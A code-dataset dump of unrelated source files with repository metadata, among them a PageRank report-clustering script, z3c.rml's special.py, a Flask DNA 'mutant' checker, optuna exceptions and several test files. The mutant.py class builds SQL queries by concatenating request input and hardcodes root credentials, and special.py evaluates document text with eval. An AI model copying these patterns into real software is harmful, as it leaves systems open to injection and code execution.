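    return distance_sentence_jaccard(sentence_a, sentence_b)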
def distance_img(app,img_name_a,img_name_b):
hist_img = read_hist_img(app)
index_a = get_img_pos(img_name_a)
index_b = get_img_pos(img_name_b)
img_a = hist_img[index_a]
img_b = hist_img[index_b]
dis = distance.euclidean(img_a, img_b)
return dis
def processing(sentence_list):
line_list = []
for line in sentence_list:
if line == '':
break
line = preprocess_line(line)
words = [x.split('_') for x in line.split(' ')]
line_list.append(words)
return line_list
def calculate_txt_pr_matrix(diff_sentence_list):
pr_matrix = []
for sentence_a in diff_sentence_list:
weight_list = []
for sentence_b in diff_sentence_list:
distance = distance_sentence_jaccard(sentence_a, sentence_b)
weight = 1 - distance
weight_list.append(weight)
distance = 0
weight = 0
pr_matrix.append(weight_list)
return pr_matrix
def calculate_img_pr_matrix(app,diff_img_list):
pr_matrix = []
for img_a in diff_img_list:
weight_list = []
for img_b in diff_img_list:
distance = distance_img(app, img_a, img_b)
weight = 1 - distance
weight_list.append(weight)
distance = 0
weight = 0
pr_matrix.append(weight_list)
return pr_matrix
def get_txt_pagerank(diff_sentence_list):
pr_matrix = calculate_txt_pr_matrix(diff_sentence_list)
a_matrix = np.array(pr_matrix)
M = graphMove(a_matrix)
pr = firstPr(M)
p = 0.8
re = pageRank(p,M,pr)
return re
def get_img_pagerank(diff_img_list):
pr_matrix = calculate_img_pr_matrix(app, diff_img_list)
a_matrix = np.array(pr_matrix)
M = graphMove(a_matrix)
pr = firstPr(M)
p = 0.8
re = pageRank(p,M,pr)
return re
def calculate_cluster_txt_pr(app):
for group_id in sorted(os.listdir('/'.join([DUPLICATES_CLUSTER_PATH, app]))):
cluster_combine_tags = select_cluster_combine_tag(group_id, app)
for cluster_combine_tag in cluster_combine_tags:
cluster_ids = select_cluster_id_txt(cluster_combine_tag[0], group_id, app)
for cluster_id_ in cluster_ids:
cluster_id = cluster_id_[0]
if cluster_id != None: # contain textual candidate cluster
cluster_txt = select_cluster_txt_tag(cluster_id, group_id, app)
diff_sentence_list = []
report_id_list = []
diff_sentence_index_list = []
for cluster_info in cluster_txt:
diff_sentence_list.append(cluster_info[0])
report_id_list.append(cluster_info[1])
diff_sentence_index_list.append(cluster_info[2])
if len(diff_sentence_list) > 1:
diff_sentence_list_process = processing(diff_sentence_list)
pr = get_txt_pagerank(diff_sentence_list_process)
pr_dict = {}
flag1 = 0
for tmp in pr:
pr_dict[str(flag1)] = tmp[0]
flag1 = flag1 + 1
top_n = 0
for key,value in sorted(pr_dict.iteritems(), key=lambda d:d[1], reverse = True):
txts = (str(top_n), diff_sentence_list[int(key)], report_id_list[int(key)], diff_sentence_index_list[int(key)])
insert_top_txt_into_sql(app, group_id, cluster_combine_tag[0], txts)
top_n = top_n + 1
if len(diff_sentence_list) == 1: # there is only one sentence
txts = ('0', diff_sentence_list[0], report_id_list[0], diff_sentence_index_list[0])
insert_top_txt_into_sql(app, group_id, cluster_combine_tag[0], txts)
def calculate_cluster_img_pr(app):
for group_id in sorted(os.listdir('/'.join([DUPLICATES_CLUSTER_IMG_PATH, app]))):
cluster_combine_tags = select_cluster_combine_tag(group_id, app)
for cluster_combine_tag in cluster_combine_tags:
cluster_ids = select_cluster_id_img(cluster_combine_tag[0], group_id,app)
for cluster_id_ in cluster_ids:
cluster_id = cluster_id_[0]
if cluster_id != None: # contain image candidate cluster
cluster_img = select_cluster_img_tag(cluster_id, group_id, app)
diff_img_list = []
report_id_list = []
for cluster_info in cluster_img:
diff_img_list.append(cluster_info[0])
report_id_list.append(cluster_info[1])
if len(diff_img_list) > 1:
pr = get_img_pagerank(diff_img_list)
pr_dict = {}
flag1 = 0
for tmp in pr:
pr_dict[str(flag1)] = tmp[0]
flag1 = flag1 + 1
top_n = 0
for key,value in sorted(pr_dict.iteritems(), key=lambda d:d[1], reverse = True):
imgs = []
imgs = (str(top_n), diff_img_list[int(key)], report_id_list[int(key)])
insert_top_img_into_sql(app,group_id,cluster_combine_tag[0],imgs)
top_n = top_n + 1
if len(diff_img_list) == 1: # there is only one image
imgs = ('0', diff_img_list[0], report_id_list[0])
insert_top_img_into_sql(app,group_id,cluster_combine_tag[0],imgs)
for app in APPS:
calculate_cluster_txt_pr(app)
calculate_cluster_img_pr(app)
| 34.981928
| 118
| 0.711038
|
f7c510b35642455d7411165a157bdfbdad5b9092
| 3,643
|
py
|
Python
|
src/z3c/rml/special.py
|
a-palchikov/z3c.rml
|
7da1adb8fe1d0126fe217d2002f4796bb2f76a2e
|
[
"ZPL-2.1"
] | null | null | null |
src/z3c/rml/special.py
|
a-palchikov/z3c.rml
|
7da1adb8fe1d0126fe217d2002f4796bb2f76a2e
|
[
"ZPL-2.1"
] | null | null | null |
src/z3c/rml/special.py
|
a-palchikov/z3c.rml
|
7da1adb8fe1d0126fe217d2002f4796bb2f76a2e
|
[
"ZPL-2.1"
] | null | null | null |
##############################################################################
#
# Copyright (c) 2007 Zope Foundation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
"""Special Element Processing
"""
import six
from z3c.rml import attr, directive, interfaces
class IName(interfaces.IRMLDirectiveSignature):
"""Defines a name for a string."""
id = attr.String(
title=u'Id',
description=u'The id under which the value will be known.',
required=True)
value = attr.Text(
title=u'Value',
description=u'The text that is displayed if the id is called.',
required=True)
class Name(directive.RMLDirective):
signature = IName
def process(self):
id, value = self.getAttributeValues(valuesOnly=True)
manager = attr.getManager(self)
manager.names[id] = value
class IAlias(interfaces.IRMLDirectiveSignature):
"""Defines an alias for a given style."""
id = attr.String(
title=u'Id',
description=u'The id as which the style will be known.',
required=True)
value = attr.Style(
title=u'Value',
description=u'The style that is represented.',
required=True)
class Alias(directive.RMLDirective):
signature = IAlias
def process(self):
id, value = self.getAttributeValues(valuesOnly=True)
manager = attr.getManager(self)
manager.styles[id] = value
class TextFlowables(object):
def _getManager(self):
if hasattr(self, 'manager'):
return self.manager
else:
return attr.getManager(self)
def getPageNumber(self, elem, canvas):
return six.text_type(
canvas.getPageNumber() + int(elem.get('countingFrom', 1)) - 1
)
def getName(self, elem, canvas):
return self._getManager().get_name(
elem.get('id'),
elem.get('default')
)
def evalString(self, elem, canvas):
return do_eval(self._getText(elem, canvas, False))
def namedString(self, elem, canvas):
self._getManager().names[elem.get('id')] = self._getText(
elem, canvas, include_final_tail=False
)
return u''
def name(self, elem, canvas):
self._getManager().names[elem.get('id')] = elem.get('value')
return u''
handleElements = {'pageNumber': getPageNumber,
'getName': getName,
'evalString': evalString,
'namedString': namedString,
'name': name}
def _getText(self, node, canvas, include_final_tail=True):
text = node.text or u''
for sub in node.getchildren():
if sub.tag in self.handleElements:
text += self.handleElements[sub.tag](self, sub, canvas)
else:
self._getText(sub, canvas)
text += sub.tail or u''
if include_final_tail:
text += node.tail or u''
return text
def do_eval(value):
# Maybe still not safe
value = value.strip()
if value:
return six.text_type(eval(value.strip(), {'__builtins__': None}, {}))
return u''
| 30.613445
| 78
| 0.589075
|
306ba68a7e2da86203d02505b99a852eafc507d0
| 6,687
|
py
|
Python
|
api/mutant.py
|
jotamaggids/flask_meli_exercise
|
e9a12a93f7c9cb621ff3c367f8c5dba513132ecb
|
[
"MIT"
] | null | null | null |
api/mutant.py
|
jotamaggids/flask_meli_exercise
|
e9a12a93f7c9cb621ff3c367f8c5dba513132ecb
|
[
"MIT"
] | null | null | null |
api/mutant.py
|
jotamaggids/flask_meli_exercise
|
e9a12a93f7c9cb621ff3c367f8c5dba513132ecb
|
[
"MIT"
] | null | null | null |
import mysql.connector
import numpy as np
import sys
class Mutant:
def __init__(self, dna_chain):
self.dna_chain = dna_chain
@staticmethod
def get_dna(dna_chain):
config = {
'user': 'root',
'password': 'root',
'host': 'mysql',
'port': '3306',
'database': 'db_dna'
}
connection = mysql.connector.connect(**config)
cursor = connection.cursor(buffered=True, dictionary=True)
query = 'SELECT * FROM dna_data WHERE dna="' + dna_chain + '"'
result = cursor.execute(query)
if cursor.rowcount == 1:
records = cursor.fetchall()
cursor.close()
connection.close()
return {'result': True, 'status': records[0]['dna_status']}
else:
cursor.close()
connection.close()
return {'result': False, 'status': 3}
    # Takes a row or a column of the matrix and checks whether it contains a
    # mutant sequence; when iterating over rows it also checks the diagonal
    # that starts at the same offset.
@staticmethod
def get_row_and_columns_data(data, dna_matrix, type):
i = 0
# Iterate over the letter inside data variable, example of data: ['A' 'T' 'G' 'C' 'G' 'A']
while len(data) > i:
result = Mutant.check_mutant(data, i)
if result:
return True
elif i == 2:
break
            elif type == 'rows':
                result = Mutant.check_mutant_diagonal(i, dna_matrix)
                if result:
                    return True
            i = 1 + i
return False
@staticmethod
# Function to create a matrix from a list
def convert_list_to_matrix(dna_chain):
new_matrix_dna = []
for dna in dna_chain:
single_dna = []
for letter in dna:
new_letter = letter
single_dna.append(new_letter)
new_matrix_dna.append(single_dna)
return new_matrix_dna
@staticmethod
# Function to check if the chain is mutant or not
def check_mutant(chain, i):
if np.all(chain[i:4 + i] == chain[i]):
return True
else:
return False
def create_dna_chain(self):
dna = self.dna_chain
dna_matrix = Mutant.convert_list_to_matrix(dna)
dna_numpy_matrix = np.asarray(dna_matrix)
result = Mutant.check_mutant_rows(dna_numpy_matrix)
if result:
return True
else:
result = Mutant.check_mutant_columns(dna_numpy_matrix)
if result:
return True
return False
    # Function that iterates over the matrix row by row
@staticmethod
def check_mutant_rows(dna_matrix):
i = 0
while 6 > i:
result = Mutant.get_row_and_columns_data(dna_matrix[i], dna_matrix[i:, :], 'rows')
if result:
return True
i = 1 + i
return False
    # Function that iterates over the matrix through its columns
@staticmethod
def check_mutant_columns(dna_matrix):
i = 0
while 6 > i:
result = Mutant.get_row_and_columns_data(dna_matrix[:, i], dna_matrix[i:, :], 'columns')
if result:
return True
i = 1 + i
return False
    # Function that takes the matrix and extracts the diagonal starting at the given position
@staticmethod
def check_mutant_diagonal(i, dna_matrix):
diagonal = dna_matrix.diagonal(i)
if len(diagonal) > 3:
result = Mutant.check_mutant(diagonal, i)
if result:
return True
return False
# Function to validate that all the chain have all the characters and the exact length
def validate_adn_chain(self):
dna_join = ''.join(self.dna_chain)
list_dna = list(dna_join)
result = Mutant.validate_lenght(list_dna)
if result:
result = Mutant.validate_letters(list_dna)
if result:
return True
return False
@staticmethod
def validate_lenght(list_dna):
try:
if len(list_dna) % 6 == 0:
return True
else:
return False
except Exception as e:
print(e)
return False
@staticmethod
def validate_letters(list_dna):
dna_ch = ('A', 'C', 'G', 'T')
try:
for ch in list_dna:
if ch not in dna_ch:
return False
else:
return True
except Exception as e:
print(e)
return False
    # Queries the database to check whether the DNA chain already exists
def validate_exist_dna(self):
dna_join = ''.join(self.dna_chain)
result = Mutant.get_dna(dna_join)
        # returns whether it exists and, if so, whether it is mutant or not
if result['result']:
return result
else:
return result
def save_dna(self, dna_status):
dna_join = ''.join(self.dna_chain)
config = {
'user': 'root',
'password': 'root',
'host': 'mysql',
'port': '3306',
'database': 'db_dna'
}
connection = mysql.connector.connect(**config)
cursor = connection.cursor(buffered=True, dictionary=True)
query = "INSERT INTO db_dna.dna_data( dna, dna_status, created_at) VALUES ('" + dna_join + "','" + str(dna_status) + "', now())"
result = cursor.execute(query)
connection.commit()
cursor.close()
connection.close()
return True
def return_dna_list(self):
config = {
'user': 'root',
'password': 'root',
'host': 'mysql',
'port': '3306',
'database': 'db_dna'
}
connection = mysql.connector.connect(**config)
cursor = connection.cursor(buffered=True, dictionary=True)
query = 'SELECT SUM(dna_status = 1) AS dna_status_mutant, SUM(dna_status = 0) AS dna_status_human ' \
'FROM db_dna.dna_data WHERE dna_status = 0 OR dna_status = 1'
result = cursor.execute(query)
if cursor.rowcount == 1:
records = cursor.fetchall()
cursor.close()
connection.close()
return {'result': True, 'dna_status_human': records[0]['dna_status_human'], 'dna_status_mutant': records[0]['dna_status_mutant']}
else:
cursor.close()
connection.close()
return {'result': False, 'status': 3}
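# --- Illustrative usage sketch (not part of the original module) -------------
# The DNA chain below is only an example input; the database helpers are not
# exercised here, so no MySQL connection is needed for this snippet.
if __name__ == '__main__':
    sample_dna = ['ATGCGA', 'CAGTGC', 'TTATGT', 'AGAAGG', 'CCCCTA', 'TCACTG']
    candidate = Mutant(sample_dna)
    if candidate.validate_adn_chain():
        print('is mutant:', candidate.create_dna_chain())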
| 32.619512
| 141
| 0.54748
|
5b42821bc6f6736a5fead95c15d632157f75d817
| 2,442
|
py
|
Python
|
optuna/exceptions.py
|
thigm85/optuna
|
4680f36a470ffb9ead89abf65dcc7e7533fd789f
|
[
"MIT"
] | 1
|
2019-05-28T07:29:49.000Z
|
2019-05-28T07:29:49.000Z
|
optuna/exceptions.py
|
nabenabe0928/optuna
|
aa505125de8515518fe19ba227edf7a1d3f8ebda
|
[
"MIT"
] | null | null | null |
optuna/exceptions.py
|
nabenabe0928/optuna
|
aa505125de8515518fe19ba227edf7a1d3f8ebda
|
[
"MIT"
] | 2
|
2020-03-03T00:40:28.000Z
|
2021-01-28T11:54:32.000Z
|
class OptunaError(Exception):
"""Base class for Optuna specific errors."""
pass
class TrialPruned(OptunaError):
"""Exception for pruned trials.
This error tells a trainer that the current :class:`~optuna.trial.Trial` was pruned. It is
supposed to be raised after :func:`optuna.trial.Trial.should_prune` as shown in the following
example.
See also:
:class:`optuna.TrialPruned` is an alias of :class:`optuna.exceptions.TrialPruned`.
Example:
.. testcode::
import numpy as np
from sklearn.datasets import load_iris
from sklearn.linear_model import SGDClassifier
from sklearn.model_selection import train_test_split
import optuna
X, y = load_iris(return_X_y=True)
X_train, X_valid, y_train, y_valid = train_test_split(X, y)
classes = np.unique(y)
def objective(trial):
alpha = trial.suggest_uniform('alpha', 0.0, 1.0)
clf = SGDClassifier(alpha=alpha)
n_train_iter = 100
for step in range(n_train_iter):
clf.partial_fit(X_train, y_train, classes=classes)
intermediate_value = clf.score(X_valid, y_valid)
trial.report(intermediate_value, step)
if trial.should_prune():
raise optuna.TrialPruned()
return clf.score(X_valid, y_valid)
study = optuna.create_study(direction='maximize')
study.optimize(objective, n_trials=20)
"""
pass
class CLIUsageError(OptunaError):
"""Exception for CLI.
CLI raises this exception when it receives invalid configuration.
"""
pass
class StorageInternalError(OptunaError):
"""Exception for storage operation.
This error is raised when an operation failed in backend DB of storage.
"""
pass
class DuplicatedStudyError(OptunaError):
"""Exception for a duplicated study name.
This error is raised when a specified study name already exists in the storage.
"""
pass
class ExperimentalWarning(Warning):
"""Experimental Warning class.
This implementation exists here because the policy of `FutureWarning` has been changed
since Python 3.7 was released. See the details in
https://docs.python.org/3/library/warnings.html#warning-categories.
"""
pass
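# --- Illustrative sketch (not part of the original module) -------------------
# How a warning category such as ExperimentalWarning is typically emitted and
# filtered by downstream code:
if __name__ == "__main__":
    import warnings
    warnings.simplefilter("always", ExperimentalWarning)
    warnings.warn("this feature is experimental", ExperimentalWarning)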
| 26.835165
| 97
| 0.63923
|
4257ec826e4e2b82d80e6baadc4d1e33cc112748
| 365
|
py
|
Python
|
src/biome/text/training_results.py
|
ignacioct/biome-text
|
e4eab5fd4ea9115bd600f61e97429977053da2a5
|
[
"Apache-2.0"
] | null | null | null |
src/biome/text/training_results.py
|
ignacioct/biome-text
|
e4eab5fd4ea9115bd600f61e97429977053da2a5
|
[
"Apache-2.0"
] | null | null | null |
src/biome/text/training_results.py
|
ignacioct/biome-text
|
e4eab5fd4ea9115bd600f61e97429977053da2a5
|
[
"Apache-2.0"
] | null | null | null |
from dataclasses import dataclass
from typing import Any
from typing import Dict
@dataclass()
class TrainingResults:
"""
Training results data class
Attributes
----------
model_path: `str`
The trained model path
metrics: `Dict[str, Any]`
Related training metrics
"""
model_path: str
metrics: Dict[str, Any]
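# --- Illustrative usage sketch (not part of the original module) -------------
# The model path and metric names below are placeholders.
if __name__ == "__main__":
    results = TrainingResults(
        model_path="output/model.tar.gz",
        metrics={"training_loss": 0.12, "validation_loss": 0.18},
    )
    print(results.model_path, results.metrics)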
| 15.869565
| 33
| 0.638356
|
1b6534b7a0fee5040cfda8f240a831fe5c2c87e4
| 7,434
|
py
|
Python
|
tests/cli/test_cmd_turtle_canon.py
|
CasperWA/turtle-canon
|
6dce3121ff8c1c92b2428b49d82d69e4d8b0058e
|
[
"MIT"
] | null | null | null |
tests/cli/test_cmd_turtle_canon.py
|
CasperWA/turtle-canon
|
6dce3121ff8c1c92b2428b49d82d69e4d8b0058e
|
[
"MIT"
] | 42
|
2021-12-02T17:39:44.000Z
|
2022-03-30T06:39:59.000Z
|
tests/cli/test_cmd_turtle_canon.py
|
CasperWA/turtle-canon
|
6dce3121ff8c1c92b2428b49d82d69e4d8b0058e
|
[
"MIT"
] | null | null | null |
"""Test `turtle_canon.cli.cmd_turtle_canon` aka. the `turtle-canon` CLI."""
from pathlib import Path
from typing import TYPE_CHECKING
if TYPE_CHECKING:
from subprocess import CalledProcessError, CompletedProcess
from typing import List, Union
from .conftest import CLIOutput, CLIRunner
CLIRunnerOutput = Union[CalledProcessError, CLIOutput, CompletedProcess]
def test_version(clirunner: "CLIRunner") -> None:
"""Test `--version`."""
from turtle_canon import __version__
output: "CLIRunnerOutput" = clirunner(["--version"])
assert output.stdout == f"Turtle Canon version {__version__}\n"
def test_absolute_path(clirunner: "CLIRunner", simple_turtle_file: Path) -> None:
"""Simple test run with minimalistic Turtle file."""
output: "CLIRunnerOutput" = clirunner([str(simple_turtle_file)])
assertion_help = (
f"STDOUT: {output.stdout}\nSTDERR: {output.stderr}\nRETURN_CODE: "
f"{output.returncode}"
)
assert not output.stderr, assertion_help
assert output.stdout, assertion_help
assert output.returncode == 0, assertion_help
assert "Successful" in output.stdout, assertion_help
def test_relative_path(clirunner: "CLIRunner", simple_turtle_file: Path) -> None:
"""Simple test run with minimalistic Turtle file."""
relative_path = simple_turtle_file.relative_to("/tmp")
assert str(relative_path) == str(
Path(simple_turtle_file.parent.name) / simple_turtle_file.name
)
assert not relative_path.is_absolute()
output: "CLIRunnerOutput" = clirunner([str(relative_path)], run_dir="/tmp")
assertion_help = (
f"STDOUT: {output.stdout}\nSTDERR: {output.stderr}\nRETURN_CODE: "
f"{output.returncode}"
)
assert not output.stderr, assertion_help
assert output.stdout, assertion_help
assert output.returncode == 0, assertion_help
assert "Successful" in output.stdout, assertion_help
def test_non_existant_file(clirunner: "CLIRunner") -> None:
"""Ensure an error is printed with error code != 0 if the passed file does not
exist."""
non_existant_file = Path(__file__).resolve().parent / "non-existant.ttl"
assert (
not non_existant_file.exists()
    ), f"{non_existant_file} was expected to not exist, but surprisingly it does !"
error_substring = f"Supplied file {non_existant_file.absolute()} not found."
output: "CLIRunnerOutput" = clirunner(
[str(non_existant_file)], expected_error=error_substring
)
assertion_help = (
f"STDOUT: {output.stdout}\nSTDERR: {output.stderr}\nRETURN_CODE: "
f"{output.returncode}"
)
assert output.stderr, assertion_help
assert (
error_substring in output.stderr and error_substring not in output.stdout
), assertion_help
assert output.returncode == 1, assertion_help
assert "ERROR" in output.stderr, assertion_help
assert "Successful" not in output.stdout, assertion_help
def test_empty_file(clirunner: "CLIRunner", tmp_dir: Path) -> None:
"""Ensure a warning is printed with error code != 0 if the passed file does not
exist."""
empty_file = tmp_dir / "empty.ttl"
empty_file.touch()
assert (
empty_file.exists()
    ), f"{empty_file} was expected to exist, but surprisingly it does not !"
assert (
empty_file.read_text() == ""
    ), f"{empty_file} was expected to be empty, but surprisingly it is not !"
warning_substring = f"The Turtle file {empty_file.absolute()} is empty."
output: "CLIRunnerOutput" = clirunner([str(empty_file)])
assertion_help = (
f"STDOUT: {output.stdout}\nSTDERR: {output.stderr}\nRETURN_CODE: "
f"{output.returncode}"
)
assert output.stderr, assertion_help
assert (
warning_substring in output.stderr and warning_substring not in output.stdout
), assertion_help
assert output.returncode == 0
assert "WARNING" in output.stderr, assertion_help
assert "Successful" not in output.stdout, assertion_help
def test_multiple_files(
clirunner: "CLIRunner", single_turtle_permutations: "List[Path]"
) -> None:
"""Ensure passing multiple files to the CLI works."""
output: "CLIRunnerOutput" = clirunner([str(_) for _ in single_turtle_permutations])
assertion_help = (
f"STDOUT: {output.stdout}\nSTDERR: {output.stderr}\nRETURN_CODE: "
f"{output.returncode}"
)
assert not output.stderr, assertion_help
assert not output.stderr, assertion_help
assert output.returncode == 0
assert "Successful" in output.stdout, assertion_help
for filename in single_turtle_permutations:
assert str(filename) in output.stdout, assertion_help
def test_fail_fast(
clirunner: "CLIRunner", single_turtle_permutations: "List[Path]", tmp_dir: Path
) -> None:
"""Test `--fail-fast`."""
from copy import deepcopy
warning_file = tmp_dir / "empty.ttl"
warning_file.touch()
assert (
warning_file.exists()
    ), f"{warning_file} was expected to exist, but surprisingly it does not !"
assert (
warning_file.read_text() == ""
    ), f"{warning_file} was expected to be empty, but surprisingly it is not !"
error_file = tmp_dir / "non_existant.ttl"
assert (
not error_file.exists()
    ), f"{error_file} was expected to not exist, but surprisingly it does !"
assert len(single_turtle_permutations) == 3
original_single_turtle_permutation = deepcopy(single_turtle_permutations)
single_turtle_permutations.insert(1, error_file)
single_turtle_permutations.insert(-1, warning_file)
single_turtle_permutations.insert(-1, error_file)
error_substring = f"Supplied file {error_file.absolute()} not found."
output: "CLIRunnerOutput" = clirunner(
[str(_) for _ in single_turtle_permutations],
expected_error=error_substring,
)
assertion_help = (
f"STDOUT: {output.stdout}\nSTDERR: {output.stderr}\nRETURN_CODE: "
f"{output.returncode}"
)
assert output.stderr, assertion_help
assert (
error_substring in output.stderr and error_substring not in output.stdout
), assertion_help
assert output.returncode == 1, assertion_help
assert "ERROR" in output.stderr, assertion_help
assert "*" in output.stderr, assertion_help
assert output.stdout, assertion_help
assert "Successful" not in output.stdout, assertion_help
for filename in original_single_turtle_permutation:
assert str(filename) in output.stdout, assertion_help
for filename in set(single_turtle_permutations) - set(
original_single_turtle_permutation
):
assert str(filename) not in output.stdout, assertion_help
output: "CLIRunnerOutput" = clirunner(
["--fail-fast"] + [str(_) for _ in single_turtle_permutations],
expected_error=error_substring,
)
assertion_help = (
f"STDOUT: {output.stdout}\nSTDERR: {output.stderr}\nRETURN_CODE: "
f"{output.returncode}"
)
assert output.stderr, assertion_help
assert (
error_substring in output.stderr and error_substring not in output.stdout
), assertion_help
assert output.returncode == 1, assertion_help
assert "ERROR" in output.stderr, assertion_help
assert "*" not in output.stderr, assertion_help
assert not output.stdout, assertion_help
assert "Successful" not in output.stdout, assertion_help
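# --- Illustrative sketch (not part of the original tests) --------------------
# The `clirunner` fixture imported from conftest is assumed to invoke the CLI
# in a subprocess, roughly like the stand-in below (the executable name
# `turtle-canon` is an assumption).
def run_turtle_canon_directly(args, run_dir=None):
    """Hypothetical stand-in for what the `clirunner` fixture is assumed to do."""
    import subprocess
    return subprocess.run(
        ["turtle-canon", *args], cwd=run_dir, capture_output=True, text=True
    )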
| 35.569378
| 87
| 0.703255
|
224248e1859c0a0b3e2507a16cbf950cc50e35cf
| 608
|
py
|
Python
|
taiga/users/migrations/0017_auto_20160208_1751.py
|
threefoldtech/Threefold-Circles
|
cbc433796b25cf7af9a295af65d665a4a279e2d6
|
[
"Apache-2.0"
] | 1
|
2017-05-29T19:01:06.000Z
|
2017-05-29T19:01:06.000Z
|
docker-images/taigav2/taiga-back/taiga/users/migrations/0017_auto_20160208_1751.py
|
mattcongy/itshop
|
6be025a9eaa7fe7f495b5777d1f0e5a3184121c9
|
[
"MIT"
] | 12
|
2019-11-25T14:08:32.000Z
|
2021-06-24T10:35:51.000Z
|
taiga/users/migrations/0017_auto_20160208_1751.py
|
threefoldtech/Threefold-Circles
|
cbc433796b25cf7af9a295af65d665a4a279e2d6
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('users', '0016_auto_20160204_1050'),
]
operations = [
migrations.AlterModelOptions(
name='role',
options={'ordering': ['order', 'slug'], 'verbose_name': 'role', 'verbose_name_plural': 'roles'},
),
migrations.AlterModelOptions(
name='user',
options={'ordering': ['username'], 'verbose_name': 'user', 'verbose_name_plural': 'users'},
),
]
| 26.434783
| 108
| 0.592105
|
1ef362e1d63e3c9c5fed6b83dc03815cab1fdee6
| 4,114
|
py
|
Python
|
test/data_validation_test.py
|
TomGoBravo/covid-data-model
|
089e4e81db32befd6e86e4e105454629fd834ad2
|
[
"MIT"
] | null | null | null |
test/data_validation_test.py
|
TomGoBravo/covid-data-model
|
089e4e81db32befd6e86e4e105454629fd834ad2
|
[
"MIT"
] | null | null | null |
test/data_validation_test.py
|
TomGoBravo/covid-data-model
|
089e4e81db32befd6e86e4e105454629fd834ad2
|
[
"MIT"
] | null | null | null |
import logging
import pytest
import pandas as pd
from libs.datasets import JHUDataset
from libs.datasets import CDSDataset
from libs.datasets import dataset_utils
from libs.datasets import custom_aggregations
from libs.datasets.dataset_utils import AggregationLevel
from libs import CovidDatasets
_logger = logging.getLogger(__name__)
@pytest.mark.skip
@pytest.mark.parametrize(
"test_missing,test_matching",
[(True, True)]
)
@pytest.mark.parametrize(
"legacy_cls,new_cls",
[(CovidDatasets.JHUDataset, JHUDataset), (CovidDatasets.CDSDataset, CDSDataset),],
)
def test_missing_state_in_generic_dataset(legacy_cls, new_cls, test_matching, test_missing):
if test_matching:
test_type = "values match"
elif test_missing:
test_type = "values are both included"
print(f"Running on {legacy_cls} checking that {test_type}")
legacy_jhu = legacy_cls()
jhu = new_cls.local().timeseries().get_subset(None, after="2020-03-02")
new = jhu.get_subset(AggregationLevel.STATE, country="USA")
new.latest_values(AggregationLevel.STATE)
state_groupby = ["country", "date", "state"]
not_matching_states = []
missing_states = []
for state in new.states:
if len(state) > 2:
# Some of the states have weird data (i.e. cruise ship), skipping
continue
try:
old_timeseries = legacy_jhu.get_timeseries_by_country_state(
"USA", state, 4
)
except Exception:
print(f"missing data for old timeseries: {state}")
new_timeseries = new.get_data(state=state)
# New data does not contain synthetics.
non_synthetic = old_timeseries[old_timeseries.synthetic.isnull()]
comparison_result = dataset_utils.compare_datasets(
non_synthetic,
new_timeseries,
state_groupby,
first_name="old",
other_name="new",
)
all_combined, matching, not_matching, missing = comparison_result
if test_matching and len(not_matching):
not_matching_states.append((state, not_matching))
if test_missing and len(missing):
missing_states.append((state, missing))
if not_matching_states:
for state, data in not_matching_states:
print(state)
print(data)
if missing_states:
for state, data in missing_states:
print(state)
print(data)
if not_matching_states or missing_states:
assert False
def default_timeseries_row(**updates):
data = {
'fips': '22083',
'aggregate_level': 'county',
'date': '2020-03-26 00:00:00',
'country': 'USA',
'state': 'NY',
'cases': 10.0,
'deaths': 1.0,
'recovered': 0.0,
'source': 'JHU',
'generated': False,
'county': 'Richland Parish'
}
data.update(updates)
return data
@pytest.mark.parametrize("are_boroughs_zero", [True, False])
def test_nyc_aggregation(are_boroughs_zero):
nyc_county_fips = custom_aggregations.NEW_YORK_COUNTY_FIPS
nyc_borough_fips = custom_aggregations.NYC_BOROUGH_FIPS[0]
nyc_cases = 10
borough_cases = 0 if are_boroughs_zero else 10
rows = [
default_timeseries_row(fips=nyc_county_fips, cases=nyc_cases),
default_timeseries_row(
fips=nyc_borough_fips, cases=borough_cases, deaths=borough_cases, recovered=borough_cases
),
default_timeseries_row()
]
df = pd.DataFrame(rows)
# Todo: figure out a better way to define these groups.
group = [
'date', 'source', 'country', 'aggregate_level', 'state', 'generated'
]
result = custom_aggregations.update_with_combined_new_york_counties(
df, group, are_boroughs_zero=are_boroughs_zero
)
results = result.sort_values('fips').to_dict(orient='records')
assert len(results) == 2
nyc_result = results[1]
if are_boroughs_zero:
assert nyc_result['cases'] == nyc_cases
else:
assert nyc_result['cases'] == nyc_cases + borough_cases
| 31.166667
| 101
| 0.660914
|
83f947937c3309597f6ba452452437c2eb3dad8e
| 13,657
|
py
|
Python
|
rgb_stacking/task.py
|
perferom123/rgb_stacking
|
e496cfc2d17a282bddf042bf6c2a53b322d3e618
|
[
"Apache-2.0"
] | 1
|
2021-10-13T11:51:01.000Z
|
2021-10-13T11:51:01.000Z
|
rgb_stacking/task.py
|
perferom123/rgb_stacking
|
e496cfc2d17a282bddf042bf6c2a53b322d3e618
|
[
"Apache-2.0"
] | null | null | null |
rgb_stacking/task.py
|
perferom123/rgb_stacking
|
e496cfc2d17a282bddf042bf6c2a53b322d3e618
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2021 DeepMind Technologies Limited. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""A module for constructing the RGB stacking task.
This file builds the composer task containing a single sawyer robot facing
3 objects: a red, a green and a blue one.
We define:
- All the simulation objects, robot, basket, objects.
- The sensors to measure the state of the environment.
- The effector to control the robot.
- The initialization logic.
On top of this we can build a MoMa subtask environment. In this subtask
environment we will decide what the reward will be and what observations are
exposed. Thus allowing us to change the goal without changing this environment.
"""
from typing import Sequence
from dm_control import composer
from dm_control.composer.variation import distributions
from dm_control.composer.variation import rotations
from dm_robotics.geometry import pose_distribution
from dm_robotics.manipulation.props.rgb_objects import rgb_object
